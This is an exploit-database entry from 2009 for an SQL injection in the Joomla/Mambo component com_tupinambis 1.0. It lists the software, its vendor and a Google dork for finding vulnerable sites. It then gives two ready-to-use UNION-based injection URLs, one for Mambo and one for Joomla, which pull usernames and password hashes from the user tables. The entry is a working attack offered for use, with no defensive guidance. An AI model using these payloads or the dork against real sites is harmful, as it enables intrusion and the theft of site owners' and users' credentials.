Joomla / Mambo Tupinambis SQL Injection

2009-09-22T00:00:00
ID 1337DAY-ID-9855
Type zdt
Reporter Don Tukulesto
Modified 2009-09-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================
Joomla/Mambo Tupinambis SQL Injection
=====================================

#######################################################
## Mambo/Joomla SQL Injection Vulneralbility         ##
## Component : com_tupinambis                    ##
## Release : September 23, 2009                  ##
## --------------------------------------------------##
##.---..-..-..-.,-..-..-..-.   .---..---..---..----. ##
##`| |'| || || . < | || || |__ | |-  \ \ `| |'| || | ##
## `-' `----'`-'`-'`----'`----'`---'`---' `-' `----' ##
##-------------------------------------------------- ##
#######################################################
 
[+] Author  : Don Tukulesto
[+] Homepage    : http://www.indonesiancoder.com
[+] Location    : Republik Indonesia
 
#######################################################
 
[ Software Information ]
 
[+] Software      : com_tupinambis
[+] Version   : 1.0
[+] Vendor    : www.tupinambis.net
[+] Download      : http://www.onestopjoomla.com/extensions/auction/tupinambis/
[+] Vulnerability : SQL Injection
[+] Google Dork   : inurl:"com_tupinambis"
 
#######################################################
[ ExPL0!T ]
 
[+] Mambo : http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+mos_users--
 
[+] Joomla : http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+jos_users--
 
#######################################################



#  0day.today [2018-04-03]  #